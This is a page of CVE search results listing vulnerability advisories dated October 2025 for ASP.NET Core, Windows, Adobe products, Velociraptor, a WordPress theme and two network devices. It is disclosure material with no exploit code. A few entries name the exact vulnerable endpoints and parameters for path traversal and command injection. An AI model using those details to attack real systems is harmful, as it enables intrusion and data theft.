Search
Search Results (314349 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2025-55315 | 2025-10-15 | 9.9 Critical | ||
| Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network. | ||||
| CVE-2025-53717 | 2025-10-15 | 7 High | ||
| Reliance on untrusted inputs in a security decision in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally. | ||||
| CVE-2025-55247 | 2025-10-15 | 7.3 High | ||
| Improper link resolution before file access ('link following') in .NET allows an authorized attacker to elevate privileges locally. | ||||
| CVE-2025-8093 | 2025-10-15 | N/A | ||
| Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Authenticator Login allows Authentication Bypass.This issue affects Authenticator Login: from 0.0.0 before 2.1.8. | ||||
| CVE-2025-54253 | 1 Adobe | 2 Experience Manager, Experience Manager Forms | 2025-10-15 | 10 Critical |
| Adobe Experience Manager versions 6.5.23 and earlier are affected by a Misconfiguration vulnerability that could result in arbitrary code execution. An attacker could leverage this vulnerability to bypass security mechanisms and execute code. Exploitation of this issue does not require user interaction and scope is changed. | ||||
| CVE-2025-6264 | 1 Rapid7 | 1 Velociraptor | 2025-10-15 | 5.5 Medium |
| Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator' role). | ||||
| CVE-2025-62448 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62447 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62446 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62445 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62444 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62443 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62442 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62441 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-62440 | 2025-10-15 | N/A | ||
| Not used | ||||
| CVE-2025-11746 | 2025-10-15 | 8.8 High | ||
| The XStore theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.5.4 via theet_ajax_required_plugins_popup() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | ||||
| CVE-2025-54278 | 2025-10-15 | 5.5 Medium | ||
| Bridge versions 14.1.8, 15.1.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | ||||
| CVE-2025-54268 | 2025-10-15 | 7.8 High | ||
| Bridge versions 14.1.8, 15.1.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | ||||
| CVE-2024-13991 | 2025-10-15 | N/A | ||
| Huijietong Cloud Video Platform contains a path traversal vulnerability that allows an unauthenticated attacker can supply arbitrary file paths to the `fullPath` parameter of the `/fileDownload?action=downloadBackupFile` endpoint and retrieve files from the server filesystem. VulnCheck has observed this vulnerability being targeted by the Rondo botnet. | ||||
| CVE-2023-7311 | 2025-10-15 | N/A | ||
| BYTEVALUE Intelligent Flow Control Router contains a command injection vulnerability via the /goform/webRead/open endpoint. The `path` parameter is not properly validated and is echoed into a shell context, allowing an attacker to inject and execute arbitrary shell commands on the device. Successful exploitation can lead to writing backdoors, privilege escalation on the host, and full compromise of the router and its management functions. VulnCheck has observed this vulnerability being targeted by the Rondo botnet. | ||||